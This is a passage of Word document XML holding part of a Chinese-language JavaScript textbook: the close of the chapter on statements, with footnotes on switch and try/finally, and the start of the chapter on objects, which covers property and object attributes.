      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句小结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言中的每种语句。表</w:t>
      </w:r>
      <w:r>
        <w:t>5-1</w:t>
      </w:r>
      <w:r>
        <w:t>是本章的总结，列出了每种语句的语法和用途：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4144992" cy="1328467"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="13" name="00013.jpeg" descr="000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00013.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4144992" cy="1328467"/>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672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="4050101"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14" name="00014.jpeg" descr="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00014.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="4050101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式的值是在运行时（</w:t>
      </w:r>
      <w:r>
        <w:t>run-time</w:t>
      </w:r>
      <w:r>
        <w:t>）计算的，这一点使得</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句有很大区别（并且效率也很低）。在</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
      <w:r>
        <w:t>表达式必须为同类型的编译时（</w:t>
      </w:r>
      <w:r>
        <w:t>compile-time</w:t>
      </w:r>
      <w:r>
        <w:t>）常量，而且</w:t>
      </w:r>
      <w:r>
        <w:t>switc</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>语句通常会编译成一个跳转表（</w:t>
      </w:r>
      <w:r>
        <w:t>jump table</w:t>
      </w:r>
      <w:r>
        <w:t>），这让</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句的执行非常高效。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>5.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会讲到，在使用</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环和</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环并不等价。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的实现可能会抛出一个类型错误异常。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>按照原文的描述，这段代码将正常执行，并</w:t>
      </w:r>
      <w:r>
        <w:t>foo()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会有正常的返回值，参照这段代码：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var foo=function(){ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">try{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>抛出一个异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">finally{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>return 1;//</w:t>
      </w:r>
      <w:r>
        <w:t>未处理异常直接返回，这里将正常返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">foo(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="Di_6Zhang__Dui_Xiang_____Dui_Xiang_Shi_J"/>
      <w:bookmarkStart w:id="135" w:name="Di_6Zhang__Dui_Xiang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章　对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基本数据类型。对象是一种复合值：它将很多值（原始值或者其他对象）聚合在一起，可通过名字访问这些值。对象也可看做是属性的无序集合，每个属性都是一个名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。属性名是字符串，因此我们可以把对象看成是从字符串到值的映射。这种基本数据结构还有很多种叫法，有些我们已然非常熟悉，比如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>散列</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>散列表</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>hashtable</w:t>
      </w:r>
      <w:r>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字典</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>dictionary</w:t>
      </w:r>
      <w:r>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>关联数组</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>sociative array</w:t>
      </w:r>
      <w:r>
        <w:t>）。然而对象不仅仅是字符串到值的映射，除了可以保持自有的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象还可以从一个称为原型的对象继承属性。对象的方法通常是继承的属性。这种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原型式继承</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>prototypal inheritance</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的核心特征。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象是动态的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>可以新增属性也可以删除属性</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>但它们常用来模拟静态对象以及静态类型语言中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构体</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:t>）。有时它们也用做字符串的集合（忽略名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对中的值）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了字符串、数字、</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的值都是对象。尽管字符串、数字和布尔值不是对象，但它们的行为和不可变对象（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）非常类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.7</w:t>
      </w:r>
      <w:r>
        <w:t>节已经讲到，对象是可变的，我们通过引用而非值来操作对象。如果变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是指向一个对象的引用，那么执行代码</w:t>
      </w:r>
      <w:r>
        <w:t>var y=x;</w:t>
      </w:r>
      <w:r>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>也是指向同一个对象的引用，而非这个对象的副本。通过变量</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>修改这个对象亦会对变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>造成影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象最常见的用法是创建（</w:t>
      </w:r>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:t>）、设置（</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>）、查找（</w:t>
      </w:r>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>）、删除（</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>）、检测（</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>）和枚举（</w:t>
      </w:r>
      <w:r>
        <w:t>enumera</w:t>
      </w:r>
      <w:r>
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:t>）它的属性。我们会在开始的几节讲述这些基础操作。后续的几节讲述高级主题，其中相当一部分内容来自于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性包括名字和值。属性名可以是包含空字符串在内的任意字符串，但对象中不能存在两个同名的属性。值可以是任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值，或者（在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中）可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>函数（或两者都有）。</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节会有关于</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>函数的讲解。除了名字和值之外，每个属性还有一些与之相关的值，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>属性特性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>property attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可写（</w:t>
      </w:r>
      <w:r>
        <w:t>writable attribute</w:t>
      </w:r>
      <w:r>
        <w:t>），表明是否可以设置该属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可枚举（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable attribute</w:t>
      </w:r>
      <w:r>
        <w:t>），表明是否可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环返回该属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可配置（</w:t>
      </w:r>
      <w:r>
        <w:t>configurable attribute</w:t>
      </w:r>
      <w:r>
        <w:t>），表明是否可以删除或修改该属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前，通过代码给对象创建的所有属性都是可写的、可枚举的和可配置的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中则可以对这些特性加以配置。</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述如何操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了包含属性之外，每个对象还拥有三个相关的对象特性（</w:t>
      </w:r>
      <w:r>
        <w:t>object at</w:t>
      </w:r>
      <w:r>
        <w:t>tribute</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原型（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>）指向另外一个对象，本对象的属性继承自它的原型对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对象的类（</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个标识对象类型的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对象的扩展标记（</w:t>
      </w:r>
      <w:r>
        <w:t>extensible flag</w:t>
      </w:r>
      <w:r>
        <w:t>）指明了（在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中）是否可以向该对象添加新属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会有关于原型和属性继承的讲述，</w:t>
      </w:r>
      <w:r>
        <w:t>6.8</w:t>
      </w:r>
      <w:r>
        <w:t>节会进一步详细讲述这三个特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，我们用下面这些术语来对三类</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象和两类属性作区分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>内置对象（</w:t>
      </w:r>
      <w:r>
        <w:t>native object</w:t>
      </w:r>
      <w:r>
        <w:t>）是由</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范定义的对象或类。例如，数组、函数、日期和正则表达式都是内置对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>宿主对象（</w:t>
      </w:r>
      <w:r>
        <w:t>host object</w:t>
      </w:r>
      <w:r>
        <w:t>）是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器所嵌入的宿主环境（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器）定义的。客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中表示网页结构的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象均是宿主对象。既然宿主环境定义的方法可以当成普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数对象，那么宿主对象也可以当成内置对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>自定义对象（</w:t>
      </w:r>
      <w:r>
        <w:t>user-defined object</w:t>
      </w:r>
      <w:r>
        <w:t>）是由运行中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>自有属性（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">own </w:t>
      </w:r>
      <w:r>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:t>）是直接在对象中定义的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性（</w:t>
      </w:r>
      <w:r>
        <w:t>inherited property</w:t>
      </w:r>
      <w:r>
        <w:t>）是在对象的原型对象中定义的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="6_1_Chuang_Jian_Dui_Xiang_"/>
      <w:r>
        <w:t>6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　创建对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
